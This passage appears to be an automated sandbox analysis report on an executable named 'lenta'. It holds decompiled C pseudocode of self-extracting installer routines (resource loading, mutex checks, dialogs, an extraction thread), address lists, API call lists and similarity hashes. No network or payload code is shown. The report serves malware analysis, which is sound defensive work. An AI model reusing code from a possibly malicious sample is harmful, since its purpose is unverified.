                                                                                                                                                                                                                                            						goto L38;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = 0x4b1;
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                            0x00a9321b
                                                                                                                                                                                                                                            0x00a9321e
                                                                                                                                                                                                                                            0x00a93221
                                                                                                                                                                                                                                            0x00a9343c
                                                                                                                                                                                                                                            0x00a9343e
                                                                                                                                                                                                                                            0x00a9343f
                                                                                                                                                                                                                                            0x00a93445
                                                                                                                                                                                                                                            0x00a93447
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93447
                                                                                                                                                                                                                                            0x00a93229
                                                                                                                                                                                                                                            0x00a9322a
                                                                                                                                                                                                                                            0x00a9322f
                                                                                                                                                                                                                                            0x00a933ec
                                                                                                                                                                                                                                            0x00a933f7
                                                                                                                                                                                                                                            0x00a93410
                                                                                                                                                                                                                                            0x00a93416
                                                                                                                                                                                                                                            0x00a9341d
                                                                                                                                                                                                                                            0x00a9342d
                                                                                                                                                                                                                                            0x00a9342d
                                                                                                                                                                                                                                            0x00a93438
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93438
                                                                                                                                                                                                                                            0x00a93237
                                                                                                                                                                                                                                            0x00a93243
                                                                                                                                                                                                                                            0x00a93243
                                                                                                                                                                                                                                            0x00a93246
                                                                                                                                                                                                                                            0x00a932ee
                                                                                                                                                                                                                                            0x00a932f4
                                                                                                                                                                                                                                            0x00a932f6
                                                                                                                                                                                                                                            0x00a933d4
                                                                                                                                                                                                                                            0x00a933d6
                                                                                                                                                                                                                                            0x00a933db
                                                                                                                                                                                                                                            0x00a933dc
                                                                                                                                                                                                                                            0x00a933de
                                                                                                                                                                                                                                            0x00a933df
                                                                                                                                                                                                                                            0x00a93370
                                                                                                                                                                                                                                            0x00a93372
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93372
                                                                                                                                                                                                                                            0x00a932fc
                                                                                                                                                                                                                                            0x00a93301
                                                                                                                                                                                                                                            0x00a93301
                                                                                                                                                                                                                                            0x00a93303
                                                                                                                                                                                                                                            0x00a93304
                                                                                                                                                                                                                                            0x00a93304
                                                                                                                                                                                                                                            0x00a9330a
                                                                                                                                                                                                                                            0x00a9330d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93313
                                                                                                                                                                                                                                            0x00a93318
                                                                                                                                                                                                                                            0x00a9331a
                                                                                                                                                                                                                                            0x00a93331
                                                                                                                                                                                                                                            0x00a93332
                                                                                                                                                                                                                                            0x00a9333a
                                                                                                                                                                                                                                            0x00a9333d
                                                                                                                                                                                                                                            0x00a9337c
                                                                                                                                                                                                                                            0x00a93388
                                                                                                                                                                                                                                            0x00a9338f
                                                                                                                                                                                                                                            0x00a93394
                                                                                                                                                                                                                                            0x00a93396
                                                                                                                                                                                                                                            0x00a933a4
                                                                                                                                                                                                                                            0x00a933ab
                                                                                                                                                                                                                                            0x00a933b6
                                                                                                                                                                                                                                            0x00a933be
                                                                                                                                                                                                                                            0x00a933c3
                                                                                                                                                                                                                                            0x00a933c5
                                                                                                                                                                                                                                            0x00a93435
                                                                                                                                                                                                                                            0x00a93437
                                                                                                                                                                                                                                            0x00a93437
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93437
                                                                                                                                                                                                                                            0x00a933c7
                                                                                                                                                                                                                                            0x00a933c9
                                                                                                                                                                                                                                            0x00a933cc
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a933cc
                                                                                                                                                                                                                                            0x00a933ad
                                                                                                                                                                                                                                            0x00a933b4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a933b4
                                                                                                                                                                                                                                            0x00a93398
                                                                                                                                                                                                                                            0x00a93399
                                                                                                                                                                                                                                            0x00a9339b
                                                                                                                                                                                                                                            0x00a9339c
                                                                                                                                                                                                                                            0x00a9339d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9339d
                                                                                                                                                                                                                                            0x00a9334c
                                                                                                                                                                                                                                            0x00a93351
                                                                                                                                                                                                                                            0x00a93354
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9335c
                                                                                                                                                                                                                                            0x00a93362
                                                                                                                                                                                                                                            0x00a93364
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93366
                                                                                                                                                                                                                                            0x00a93367
                                                                                                                                                                                                                                            0x00a93369
                                                                                                                                                                                                                                            0x00a9336a
                                                                                                                                                                                                                                            0x00a9336b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9336b
                                                                                                                                                                                                                                            0x00a9331c
                                                                                                                                                                                                                                            0x00a93323
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93329
                                                                                                                                                                                                                                            0x00a9332b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9332b
                                                                                                                                                                                                                                            0x00a9324c
                                                                                                                                                                                                                                            0x00a9324c
                                                                                                                                                                                                                                            0x00a9324f
                                                                                                                                                                                                                                            0x00a932c8
                                                                                                                                                                                                                                            0x00a932ce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a932ce
                                                                                                                                                                                                                                            0x00a93251
                                                                                                                                                                                                                                            0x00a93256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93271
                                                                                                                                                                                                                                            0x00a93277
                                                                                                                                                                                                                                            0x00a93279
                                                                                                                                                                                                                                            0x00a93298
                                                                                                                                                                                                                                            0x00a9329d
                                                                                                                                                                                                                                            0x00a9329f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a932b0
                                                                                                                                                                                                                                            0x00a932b6
                                                                                                                                                                                                                                            0x00a932b8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a932be
                                                                                                                                                                                                                                            0x00a93280
                                                                                                                                                                                                                                            0x00a93289
                                                                                                                                                                                                                                            0x00a9328e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9328e
                                                                                                                                                                                                                                            0x00a9327b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9327b
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000003E8,00A98598,00000200), ref: 00A93271
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A933E2
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,lenta), ref: 00A933F7
                                                                                                                                                                                                                                            • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A93410
                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000836), ref: 00A93426
                                                                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 00A9342D
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000000), ref: 00A9343F
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$lenta
                                                                                                                                                                                                                                            • API String ID: 2418873061-2011945725
                                                                                                                                                                                                                                            • Opcode ID: 9905a4bff75b37f91540f869a5148204f924e1b9294029a7183182ad3983234c
                                                                                                                                                                                                                                            • Instruction ID: 2019e256d002927090024b02adf54369c2bacef0d64672ebdb75fadfa15a0e67
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9905a4bff75b37f91540f869a5148204f924e1b9294029a7183182ad3983234c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF514D3238024077EF219B795D4DFBB29FCEB96B55F20412AF106DA1D0DEA4CE0392A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A92CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                                            				struct HRSRC__* _t31;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t43;
                                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t13 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                            				_t65 = 0;
                                                                                                                                                                                                                                            				_t66 = __ecx;
                                                                                                                                                                                                                                            				_t48 = __edx;
                                                                                                                                                                                                                                            				 *0xa99a3c = __ecx;
                                                                                                                                                                                                                                            				memset(0xa99140, 0, 0x8fc);
                                                                                                                                                                                                                                            				memset(0xa98a20, 0, 0x32c);
                                                                                                                                                                                                                                            				memset(0xa988c0, 0, 0x104);
                                                                                                                                                                                                                                            				 *0xa993ec = 1;
                                                                                                                                                                                                                                            				_t20 = E00A9468F("TITLE", 0xa99154, 0x7f);
                                                                                                                                                                                                                                            				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                            					_t64 = 0x4b1;
                                                                                                                                                                                                                                            					goto L32;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                            					 *0xa9858c = _t27;
                                                                                                                                                                                                                                            					SetEvent(_t27);
                                                                                                                                                                                                                                            					_t64 = 0xa99a34;
                                                                                                                                                                                                                                            					if(E00A9468F("EXTRACTOPT", 0xa99a34, 4) != 0) {
                                                                                                                                                                                                                                            						if(( *0xa99a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            							L12:
                                                                                                                                                                                                                                            							 *0xa99120 =  *0xa99120 & _t65;
                                                                                                                                                                                                                                            							if(E00A95C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                            								if( *0xa98a3a == 0) {
                                                                                                                                                                                                                                            									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                            									if(_t31 != 0) {
                                                                                                                                                                                                                                            										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0xa98184 != 0) {
                                                                                                                                                                                                                                            										__imp__#17();
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if( *0xa98a24 == 0) {
                                                                                                                                                                                                                                            										_t57 = _t65;
                                                                                                                                                                                                                                            										if(E00A936EE(_t65) == 0) {
                                                                                                                                                                                                                                            											goto L33;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t33 =  *0xa99a40; // 0x3
                                                                                                                                                                                                                                            											_t48 = 1;
                                                                                                                                                                                                                                            											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                            												if(( *0xa99a34 & 0x00000100) == 0 || ( *0xa98a38 & 0x00000001) != 0 || E00A918A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t64 = 0x7d6;
                                                                                                                                                                                                                                            													if(E00A96517(_t57, 0x7d6, _t34, E00A919E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                            														goto L33;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												L30:
                                                                                                                                                                                                                                            												_t23 = _t48;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t23 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A92390(0xa98a3a);
                                                                                                                                                                                                                                            									goto L33;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t64 = 0x520;
                                                                                                                                                                                                                                            								L32:
                                                                                                                                                                                                                                            								E00A944B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L33;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 =  &_v268;
                                                                                                                                                                                                                                            							if(E00A9468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            								goto L3;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                                                            								 *0xa98588 = _t43;
                                                                                                                                                                                                                                            								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(( *0xa99a34 & 0x00000080) == 0) {
                                                                                                                                                                                                                                            										_t64 = 0x524;
                                                                                                                                                                                                                                            										if(E00A944B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                                                            											goto L12;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L11;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t64 = 0x54b;
                                                                                                                                                                                                                                            										E00A944B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                                                                                                                                                                                            										L11:
                                                                                                                                                                                                                                            										CloseHandle( *0xa98588);
                                                                                                                                                                                                                                            										 *0xa99124 = 0x800700b7;
                                                                                                                                                                                                                                            										goto L33;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t64 = 0x4b1;
                                                                                                                                                                                                                                            						E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						 *0xa99124 = 0x80070714;
                                                                                                                                                                                                                                            						L33:
                                                                                                                                                                                                                                            						_t23 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00a92cb5
                                                                                                                                                                                                                                            0x00a92cbc
                                                                                                                                                                                                                                            0x00a92cc7
                                                                                                                                                                                                                                            0x00a92cc9
                                                                                                                                                                                                                                            0x00a92cd1
                                                                                                                                                                                                                                            0x00a92cd3
                                                                                                                                                                                                                                            0x00a92cd9
                                                                                                                                                                                                                                            0x00a92ce9
                                                                                                                                                                                                                                            0x00a92cf9
                                                                                                                                                                                                                                            0x00a92d0e
                                                                                                                                                                                                                                            0x00a92d15
                                                                                                                                                                                                                                            0x00a92d1c
                                                                                                                                                                                                                                            0x00a92ef3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92d2d
                                                                                                                                                                                                                                            0x00a92d34
                                                                                                                                                                                                                                            0x00a92d3b
                                                                                                                                                                                                                                            0x00a92d40
                                                                                                                                                                                                                                            0x00a92d48
                                                                                                                                                                                                                                            0x00a92d59
                                                                                                                                                                                                                                            0x00a92d84
                                                                                                                                                                                                                                            0x00a92e1f
                                                                                                                                                                                                                                            0x00a92e1f
                                                                                                                                                                                                                                            0x00a92e2e
                                                                                                                                                                                                                                            0x00a92e41
                                                                                                                                                                                                                                            0x00a92e5a
                                                                                                                                                                                                                                            0x00a92e62
                                                                                                                                                                                                                                            0x00a92e6c
                                                                                                                                                                                                                                            0x00a92e6c
                                                                                                                                                                                                                                            0x00a92e75
                                                                                                                                                                                                                                            0x00a92e77
                                                                                                                                                                                                                                            0x00a92e77
                                                                                                                                                                                                                                            0x00a92e84
                                                                                                                                                                                                                                            0x00a92e8b
                                                                                                                                                                                                                                            0x00a92e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92e96
                                                                                                                                                                                                                                            0x00a92e96
                                                                                                                                                                                                                                            0x00a92e9e
                                                                                                                                                                                                                                            0x00a92ea2
                                                                                                                                                                                                                                            0x00a92eba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92ece
                                                                                                                                                                                                                                            0x00a92ede
                                                                                                                                                                                                                                            0x00a92eed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92eed
                                                                                                                                                                                                                                            0x00a92eef
                                                                                                                                                                                                                                            0x00a92eef
                                                                                                                                                                                                                                            0x00a92eef
                                                                                                                                                                                                                                            0x00a92eef
                                                                                                                                                                                                                                            0x00a92ea2
                                                                                                                                                                                                                                            0x00a92e86
                                                                                                                                                                                                                                            0x00a92e88
                                                                                                                                                                                                                                            0x00a92e88
                                                                                                                                                                                                                                            0x00a92e43
                                                                                                                                                                                                                                            0x00a92e48
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92e48
                                                                                                                                                                                                                                            0x00a92e30
                                                                                                                                                                                                                                            0x00a92e30
                                                                                                                                                                                                                                            0x00a92ef8
                                                                                                                                                                                                                                            0x00a92f01
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92f01
                                                                                                                                                                                                                                            0x00a92d8a
                                                                                                                                                                                                                                            0x00a92d8f
                                                                                                                                                                                                                                            0x00a92da1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92da3
                                                                                                                                                                                                                                            0x00a92dae
                                                                                                                                                                                                                                            0x00a92db4
                                                                                                                                                                                                                                            0x00a92dbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92dca
                                                                                                                                                                                                                                            0x00a92dd3
                                                                                                                                                                                                                                            0x00a92df5
                                                                                                                                                                                                                                            0x00a92e02
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92dd5
                                                                                                                                                                                                                                            0x00a92dde
                                                                                                                                                                                                                                            0x00a92de3
                                                                                                                                                                                                                                            0x00a92e04
                                                                                                                                                                                                                                            0x00a92e0a
                                                                                                                                                                                                                                            0x00a92e10
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a92e10
                                                                                                                                                                                                                                            0x00a92dd3
                                                                                                                                                                                                                                            0x00a92dbb
                                                                                                                                                                                                                                            0x00a92da1
                                                                                                                                                                                                                                            0x00a92d5b
                                                                                                                                                                                                                                            0x00a92d5b
                                                                                                                                                                                                                                            0x00a92d5d
                                                                                                                                                                                                                                            0x00a92d69
                                                                                                                                                                                                                                            0x00a92d6e
                                                                                                                                                                                                                                            0x00a92f06
                                                                                                                                                                                                                                            0x00a92f06
                                                                                                                                                                                                                                            0x00a92f06
                                                                                                                                                                                                                                            0x00a92d59
                                                                                                                                                                                                                                            0x00a92f18

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A92CD9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A92CE9
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A92CF9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92D34
                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92D40
                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92DAE
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00A92DBD
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00A92E0A
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                                                                                                                                                                                            • API String ID: 1002816675-2993962200
                                                                                                                                                                                                                                            • Opcode ID: 17b5cb8af89afaac3c0f090d79ce8a7c11588143cba92d20f9c8c289b47df541
                                                                                                                                                                                                                                            • Instruction ID: d74ed699062868c344ec5ec34d6147a52c079d1e98f9863d3ea3e8ce2b981273
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17b5cb8af89afaac3c0f090d79ce8a7c11588143cba92d20f9c8c289b47df541
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F551C3703403017BEF64ABA89D8ABBB2AE8EB55740F10402BF941D55E5DFB88C438765
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                                                                                                            			E00A934F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				struct HWND__* _t35;
                                                                                                                                                                                                                                            				struct HWND__* _t38;
                                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t9 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t9 == 0) {
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					 *0xa991d8 = 1;
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					_push(_a4);
                                                                                                                                                                                                                                            					L21:
                                                                                                                                                                                                                                            					EndDialog();
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                                            				_pop(1);
                                                                                                                                                                                                                                            				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                                                            				if(_t12 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                                                            					if(_a12 != 0x1b) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t13 = _t12 - 0xe;
                                                                                                                                                                                                                                            				if(_t13 == 0) {
                                                                                                                                                                                                                                            					_t35 = _a4;
                                                                                                                                                                                                                                            					 *0xa98584 = _t35;
                                                                                                                                                                                                                                            					E00A943D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                                                            					__eflags =  *0xa98184; // 0x1
                                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                                                            						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetWindowTextA(_t35, "lenta");
                                                                                                                                                                                                                                            					_t17 = CreateThread(0, 0, E00A94FE0, 0, 0, 0xa98798);
                                                                                                                                                                                                                                            					 *0xa9879c = _t17;
                                                                                                                                                                                                                                            					__eflags = _t17;
                                                                                                                                                                                                                                            					if(_t17 != 0) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						E00A944B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t23 = _t13 - 1;
                                                                                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                                                                                            					__eflags = _a12 - 2;
                                                                                                                                                                                                                                            					if(_a12 != 2) {
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					ResetEvent( *0xa9858c);
                                                                                                                                                                                                                                            					_t38 =  *0xa98584; // 0x0
                                                                                                                                                                                                                                            					_t25 = E00A944B9(_t38, 0x4b2, 0xa91140, 0, 0x20, 4);
                                                                                                                                                                                                                                            					__eflags = _t25 - 6;
                                                                                                                                                                                                                                            					if(_t25 == 6) {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						 *0xa991d8 = 1;
